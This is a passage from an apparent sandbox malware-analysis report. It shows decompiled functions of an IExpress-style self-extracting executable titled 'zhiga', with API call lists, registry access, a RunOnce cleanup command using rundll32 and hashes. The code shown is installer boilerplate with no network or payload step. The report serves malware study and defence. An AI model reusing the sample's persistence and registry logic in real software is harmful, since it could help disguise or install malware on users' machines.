                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010C4391
                                                          • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010C43A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                          • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                          • API String ID: 1865808269-1731843650
                                                          • Opcode ID: 377cbb253d8c0c442b48c58e1bf01aada8ea1b1b67df50a5c11cc9f4d6df9d39
                                                          • Instruction ID: 59c3760a46d83dae314afec3ffdfd6282110035ccd7605934ccde757a4383d19
                                                          • Opcode Fuzzy Hash: 377cbb253d8c0c442b48c58e1bf01aada8ea1b1b67df50a5c11cc9f4d6df9d39
                                                          • Instruction Fuzzy Hash: 4A411774A00214EFE7219F79E8989AE7FB5FB84B44F04819EE9C1E7245D77A8804CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                          				signed int _v8;
                                                          				char _v64;
                                                          				char _v576;
                                                          				void* _v580;
                                                          				struct HWND__* _v584;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t34;
                                                          				void* _t37;
                                                          				signed int _t39;
                                                          				intOrPtr _t43;
                                                          				signed int _t44;
                                                          				signed int _t49;
                                                          				signed int _t52;
                                                          				void* _t54;
                                                          				intOrPtr _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t59;
                                                          				int _t64;
                                                          				void* _t66;
                                                          				intOrPtr* _t67;
                                                          				signed int _t69;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t77;
                                                          				void* _t80;
                                                          				void* _t81;
                                                          				void* _t82;
                                                          				intOrPtr* _t84;
                                                          				void* _t85;
                                                          				signed int _t89;
                                                          
                                                          				_t75 = __edx;
                                                          				_t34 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t34 ^ _t89;
                                                          				_v584 = __ecx;
                                                          				_t83 = "LoadString() Error.  Could not load string resource.";
                                                          				_t67 = _a4;
                                                          				_t69 = 0xd;
                                                          				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                          				_t80 = _t83 + _t69 + _t69;
                                                          				_v580 = _t37;
                                                          				asm("movsb");
                                                          				if(( *0x10c8a38 & 0x00000001) != 0) {
                                                          					_t39 = 1;
                                                          				} else {
                                                          					_v576 = 0;
                                                          					LoadStringA( *0x10c9a3c, _t75,  &_v576, 0x200);
                                                          					if(_v576 != 0) {
                                                          						_t73 =  &_v576;
                                                          						_t16 = _t73 + 1; // 0x1
                                                          						_t75 = _t16;
                                                          						do {
                                                          							_t43 =  *_t73;
                                                          							_t73 = _t73 + 1;
                                                          						} while (_t43 != 0);
                                                          						_t84 = _v580;
                                                          						_t74 = _t73 - _t75;
                                                          						if(_t84 == 0) {
                                                          							if(_t67 == 0) {
                                                          								_t27 = _t74 + 1; // 0x2
                                                          								_t83 = _t27;
                                                          								_t44 = LocalAlloc(0x40, _t83);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									_t75 = _t83;
                                                          									_t74 = _t80;
                                                          									E010C1680(_t80, _t83,  &_v576);
                                                          									goto L23;
                                                          								}
                                                          							} else {
                                                          								_t76 = _t67;
                                                          								_t24 = _t76 + 1; // 0x1
                                                          								_t85 = _t24;
                                                          								do {
                                                          									_t55 =  *_t76;
                                                          									_t76 = _t76 + 1;
                                                          								} while (_t55 != 0);
                                                          								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                          								_t83 = _t25 + _t74;
                                                          								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                          								_t80 = _t44;
                                                          								if(_t80 == 0) {
                                                          									goto L6;
                                                          								} else {
                                                          									E010C171E(_t80, _t83,  &_v576, _t67);
                                                          									goto L23;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t77 = _t67;
                                                          							_t18 = _t77 + 1; // 0x1
                                                          							_t81 = _t18;
                                                          							do {
                                                          								_t58 =  *_t77;
                                                          								_t77 = _t77 + 1;
                                                          							} while (_t58 != 0);
                                                          							_t75 = _t77 - _t81;
                                                          							_t82 = _t84 + 1;
                                                          							do {
                                                          								_t59 =  *_t84;
                                                          								_t84 = _t84 + 1;
                                                          							} while (_t59 != 0);
                                                          							_t21 = _t74 + 0x64; // 0x65
                                                          							_t83 = _t21 + _t84 - _t82 + _t75;
                                                          							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                          							_t80 = _t44;
                                                          							if(_t80 == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								_push(_v580);
                                                          								E010C171E(_t80, _t83,  &_v576, _t67);
                                                          								L23:
                                                          								MessageBeep(_a12);
                                                          								if(E010C681F(_t67) == 0) {
                                                          									L25:
                                                          									_t49 = 0x10000;
                                                          								} else {
                                                          									_t54 = E010C67C9(_t74, _t74);
                                                          									_t49 = 0x190000;
                                                          									if(_t54 == 0) {
                                                          										goto L25;
                                                          									}
                                                          								}
                                                          								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                          								_t83 = _t52;
                                                          								LocalFree(_t80);
                                                          								_t39 = _t52;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						if(E010C681F(_t67) == 0) {
                                                          							L4:
                                                          							_t64 = 0x10010;
                                                          						} else {
                                                          							_t66 = E010C67C9(0, 0);
                                                          							_t64 = 0x190010;
                                                          							if(_t66 == 0) {
                                                          								goto L4;
                                                          							}
                                                          						}
                                                          						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                          						L6:
                                                          						_t39 = _t44 | 0xffffffff;
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                          			}

                                                          APIs
                                                          • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                          • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010C45A3
                                                          • LocalAlloc.KERNEL32(00000040,00000065), ref: 010C45E3
                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 010C460D
                                                          • MessageBeep.USER32(00000000), ref: 010C4630
                                                          • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 010C4666
                                                          • LocalFree.KERNEL32(00000000), ref: 010C466F
                                                            • Part of subcall function 010C681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010C686E
                                                            • Part of subcall function 010C681F: GetSystemMetrics.USER32(0000004A), ref: 010C68A7
                                                            • Part of subcall function 010C681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010C68CC
                                                            • Part of subcall function 010C681F: RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,?,0000000C), ref: 010C68F4
                                                            • Part of subcall function 010C681F: RegCloseKey.ADVAPI32(?), ref: 010C6902
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                          • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                          • API String ID: 3244514340-1120439489
                                                          • Opcode ID: 0edcb03664e2dbd66fe121bb0c7ccd59ca06e9c56e9c9d7248917543a0c6e117
                                                          • Instruction ID: 71c8b1bc04aee1f28b784acdf60237b9c138d4d93e2826e59d42631bfe298c7b
                                                          • Opcode Fuzzy Hash: 0edcb03664e2dbd66fe121bb0c7ccd59ca06e9c56e9c9d7248917543a0c6e117
                                                          • Instruction Fuzzy Hash: D951D371A00219AFDB219F28CC58BAE7BA9FF85B04F104198ED89E7246DB36D9058F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C2773(CHAR* __ecx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v269;
                                                          				CHAR* _v276;
                                                          				int _v280;
                                                          				void* _v284;
                                                          				int _v288;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t23;
                                                          				intOrPtr _t34;
                                                          				int _t45;
                                                          				int* _t50;
                                                          				CHAR* _t52;
                                                          				CHAR* _t61;
                                                          				char* _t62;
                                                          				int _t63;
                                                          				CHAR* _t64;
                                                          				signed int _t65;
                                                          
                                                          				_t52 = __ecx;
                                                          				_t23 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t23 ^ _t65;
                                                          				_t62 = _a4;
                                                          				_t50 = 0;
                                                          				_t61 = __ecx;
                                                          				_v276 = _t62;
                                                          				 *((char*)(__ecx)) = 0;
                                                          				if( *_t62 != 0x23) {
                                                          					_t63 = 0x104;
                                                          					goto L14;
                                                          				} else {
                                                          					_t64 = _t62 + 1;
                                                          					_v269 = CharUpperA( *_t64);
                                                          					_v276 = CharNextA(CharNextA(_t64));
                                                          					_t63 = 0x104;
                                                          					_t34 = _v269;
                                                          					if(_t34 == 0x53) {
                                                          						L14:
                                                          						GetSystemDirectoryA(_t61, _t63);
                                                          						goto L15;
                                                          					} else {
                                                          						if(_t34 == 0x57) {
                                                          							GetWindowsDirectoryA(_t61, 0x104);
                                                          							goto L16;
                                                          						} else {
                                                          							_push(_t52);
                                                          							_v288 = 0x104;
                                                          							E010C1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                          							_t59 = 0x104;
                                                          							E010C658A( &_v268, 0x104, _v276);
                                                          							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                          								L16:
                                                          								_t59 = _t63;
                                                          								E010C658A(_t61, _t63, _v276);
                                                          							} else {
                                                          								if(RegQueryValueExA(_v284, 0x10c1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                          									_t45 = _v280;
                                                          									if(_t45 != 2) {
                                                          										L9:
                                                          										if(_t45 == 1) {
                                                          											goto L10;
                                                          										}
                                                          									} else {
                                                          										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                          											_t45 = _v280;
                                                          											goto L9;
                                                          										} else {
                                                          											_t59 = 0x104;
                                                          											E010C1680(_t61, 0x104,  &_v268);
                                                          											L10:
                                                          											_t50 = 1;
                                                          										}
                                                          									}
                                                          								}
                                                          								RegCloseKey(_v284);
                                                          								L15:
                                                          								if(_t50 == 0) {
                                                          									goto L16;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E010C6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                          			}
                                                          0x010c2878
                                                          0x010c2865
                                                          0x010c28a0
                                                          0x010c28bf
                                                          0x010c28c1
                                                          0x00000000
                                                          0x00000000
                                                          0x010c28c1
                                                          0x010c2831
                                                          0x010c27dd
                                                          0x010c27d5
                                                          0x010c28e5

                                                          APIs
                                                          • CharUpperA.USER32(4B13CF70,00000000,00000000,00000000), ref: 010C27A8
                                                          • CharNextA.USER32(0000054D), ref: 010C27B5
                                                          • CharNextA.USER32(00000000), ref: 010C27BC
                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2829
                                                          • RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2852
                                                          • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2870
                                                          • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C28A0
                                                          • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 010C28AA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C28B9
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010C27E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                          • API String ID: 2659952014-2428544900
                                                          • Opcode ID: 57a6b5c14c2eee8f615ce15fa0699c2c21df259608e3b7842aeb78b5223d6010
                                                          • Instruction ID: f76921dfe7c6df3c84677afff6be48958066c27255deff9bf92a2d4f21fa31b9
                                                          • Opcode Fuzzy Hash: 57a6b5c14c2eee8f615ce15fa0699c2c21df259608e3b7842aeb78b5223d6010
                                                          • Instruction Fuzzy Hash: 9A41AE70A0112CAFDB259B649C84AFE7BBDEB55B40F1040EDFAC9D2105DB758E858FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E010C2267() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v836;
                                                          				void* _v840;
                                                          				int _v844;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				intOrPtr _t33;
                                                          				void* _t38;
                                                          				intOrPtr* _t42;
                                                          				void* _t45;
                                                          				void* _t47;
                                                          				void* _t49;
                                                          				signed int _t51;
                                                          
                                                          				_t19 =  *0x10c8004; // 0x4b13cf70
                                                          				_t20 = _t19 ^ _t51;
                                                          				_v8 = _t19 ^ _t51;
                                                          				if( *0x10c8530 != 0) {
                                                          					_push(_t49);
                                                          					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                          						_push(_t38);
                                                          						_v844 = 0x238;
                                                          						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                          							_push(_t47);
                                                          							memset( &_v268, 0, 0x104);
                                                          							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          								E010C658A( &_v268, 0x104, 0x10c1140);
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          							E010C171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                          							_t42 =  &_v836;
                                                          							_t45 = _t42 + 1;
                                                          							_pop(_t47);
                                                          							do {
                                                          								_t33 =  *_t42;
                                                          								_t42 = _t42 + 1;
                                                          							} while (_t33 != 0);
                                                          							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                          						}
                                                          						_t20 = RegCloseKey(_v840);
                                                          						_pop(_t38);
                                                          					}
                                                          					_pop(_t49);
                                                          				}
                                                          				return E010C6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                          			}

                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 010C22A3
                                                          • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 010C22D8
                                                          • memset.MSVCRT ref: 010C22F5
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C2305
                                                          • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 010C236E
                                                          • RegCloseKey.ADVAPI32(?), ref: 010C237A
                                                          Strings
                                                          • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 010C232D
                                                          • wextract_cleanup0, xrefs: 010C227C, 010C22CD, 010C2363
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C2321
                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 010C2299
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                          • API String ID: 3027380567-2874043782
                                                          • Opcode ID: 6d4a2529baab796585a5a9d565745935f2d5fe4f5411ec825ac9d245abfdebd9
                                                          • Instruction ID: c43fe64056461e5c3bf64ea3bdf6d6d7c4d6db2eee7ad56877f91e6c8c026349
                                                          • Opcode Fuzzy Hash: 6d4a2529baab796585a5a9d565745935f2d5fe4f5411ec825ac9d245abfdebd9
                                                          • Instruction Fuzzy Hash: 6031C571A00218ABDB719B55DC49FEE7B7CEB54B40F1001EEB98DAA001EA75AB84CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E010C3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* _t8;
                                                          				void* _t11;
                                                          				void* _t15;
                                                          				struct HWND__* _t16;
                                                          				struct HWND__* _t33;
                                                          				struct HWND__* _t34;
                                                          
                                                          				_t8 = _a8 - 0xf;
                                                          				if(_t8 == 0) {
                                                          					if( *0x10c8590 == 0) {
                                                          						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                          						 *0x10c8590 = 1;
                                                          					}
                                                          					L13:
                                                          					return 0;
                                                          				}
                                                          				_t11 = _t8 - 1;
                                                          				if(_t11 == 0) {
                                                          					L7:
                                                          					_push(0);
                                                          					L8:
                                                          					EndDialog(_a4, ??);
                                                          					L9:
                                                          					return 1;
                                                          				}
                                                          				_t15 = _t11 - 0x100;
                                                          				if(_t15 == 0) {
                                                          					_t16 = GetDesktopWindow();
                                                          					_t33 = _a4;
                                                          					E010C43D0(_t33, _t16);
                                                          					SetDlgItemTextA(_t33, 0x834,  *0x10c8d4c);
                                                          					SetWindowTextA(_t33, "zhiga");
                                                          					SetForegroundWindow(_t33);
                                                          					_t34 = GetDlgItem(_t33, 0x834);
                                                          					 *0x10c88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                          					SetWindowLongA(_t34, 0xfffffffc, E010C30C0);
                                                          					return 1;
                                                          				}
                                                          				if(_t15 != 1) {
                                                          					goto L13;
                                                          				}
                                                          				if(_a12 != 6) {
                                                          					if(_a12 != 7) {
                                                          						goto L9;
                                                          					}
                                                          					goto L7;
                                                          				}
                                                          				_push(1);
                                                          				goto L8;
                                                          			}

                                                          APIs
                                                          • EndDialog.USER32(?,00000000), ref: 010C313B
                                                          • GetDesktopWindow.USER32 ref: 010C314B
                                                          • SetDlgItemTextA.USER32(?,00000834), ref: 010C316A
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C3176
                                                          • SetForegroundWindow.USER32(?), ref: 010C317D
                                                          • GetDlgItem.USER32(?,00000834), ref: 010C3185
                                                          • GetWindowLongA.USER32(00000000,000000FC), ref: 010C3190
                                                          • SetWindowLongA.USER32(00000000,000000FC,010C30C0), ref: 010C31A3
                                                          • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 010C31CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                          • String ID: zhiga
                                                          • API String ID: 3785188418-3705506974
                                                          • Opcode ID: 6972b48765a7b58802c8981fe88d62e7d91582a4952b4264ea87cd7d3fcb292d
                                                          • Instruction ID: 9fdf0c49d9d11bcf25b26fb7031cff125070acd373f29a603c8b1ffe570b3b3c
                                                          • Opcode Fuzzy Hash: 6972b48765a7b58802c8981fe88d62e7d91582a4952b4264ea87cd7d3fcb292d
                                                          • Instruction Fuzzy Hash: FA11D531214125FFDB225B28AC0CB9E3AB4FBC6B20F008219FDD19A184E77A8541CF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E010C468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                          				long _t4;
                                                          				void* _t11;
                                                          				CHAR* _t14;
                                                          				void* _t15;
                                                          				long _t16;
                                                          
                                                          				_t14 = __ecx;
                                                          				_t11 = __edx;
                                                          				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                          				_t16 = _t4;
                                                          				if(_t16 <= _a4 && _t11 != 0) {
                                                          					if(_t16 == 0) {
                                                          						L5:
                                                          						return 0;
                                                          					}
                                                          					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                          					FreeResource(_t15);
                                                          					return _t16;
                                                          				}
                                                          				return _t4;
                                                          			}

                                                          APIs
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                          • SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                          • LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                          • LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                          • memcpy_s.MSVCRT ref: 010C46E5
                                                          • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                          • String ID: TITLE$zhiga
                                                          • API String ID: 3370778649-3314309
                                                          • Opcode ID: 8b41ef66d96bb68a1662b0f0601a75b7e2db829fd1f60649658a647760f5d889
                                                          • Instruction ID: d7995348ab2d986230da7601fea9ff7f838ab5459e8119677a7bdd16535adfc2
                                                          • Opcode Fuzzy Hash: 8b41ef66d96bb68a1662b0f0601a75b7e2db829fd1f60649658a647760f5d889
                                                          • Instruction Fuzzy Hash: 07014F36344214BFF36017A96C4DF6B7E68EBC9FA1F140018FBCAD7148D96688458BA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E010C17EE(intOrPtr* __ecx) {
                                                          				signed int _v8;
                                                          				short _v12;
                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				void* _v24;
                                                          				intOrPtr* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t14;
                                                          				_Unknown_base(*)()* _t20;
                                                          				long _t28;
                                                          				void* _t35;
                                                          				struct HINSTANCE__* _t36;
                                                          				signed int _t38;
                                                          				intOrPtr* _t39;
                                                          
                                                          				_t14 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t14 ^ _t38;
                                                          				_v12 = 0x500;
                                                          				_t37 = __ecx;
                                                          				_v16.Value = 0;
                                                          				_v28 = __ecx;
                                                          				_t28 = 0;
                                                          				_t36 = LoadLibraryA("advapi32.dll");
                                                          				if(_t36 != 0) {
                                                          					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                          					_v20 = _t20;
                                                          					if(_t20 != 0) {
                                                          						 *_t37 = 0;
                                                          						_t28 = 1;
                                                          						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                          							_t37 = _t39;
                                                          							 *0x10ca288(0, _v24, _v28);
                                                          							_v20();
                                                          							if(_t39 != _t39) {
                                                          								asm("int 0x29");
                                                          							}
                                                          							FreeSid(_v24);
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t36);
                                                          				}
                                                          				return E010C6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                          			}

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010C18DD), ref: 010C181A
                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010C182C
                                                          • AllocateAndInitializeSid.ADVAPI32(010C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010C18DD), ref: 010C1855
                                                          • FreeSid.ADVAPI32(?,?,?,?,010C18DD), ref: 010C1883
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,010C18DD), ref: 010C188A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                          • API String ID: 4204503880-1888249752
                                                          • Opcode ID: 536a70b2de405598872d0e24b7cb2f34f81eb61e5c6414ff78d4c05045e6dd08
                                                          • Instruction ID: 8015ca6d0ceb09a1f3806454058b913ac613f8e3e027cc076194718f36513687
                                                          • Opcode Fuzzy Hash: 536a70b2de405598872d0e24b7cb2f34f81eb61e5c6414ff78d4c05045e6dd08
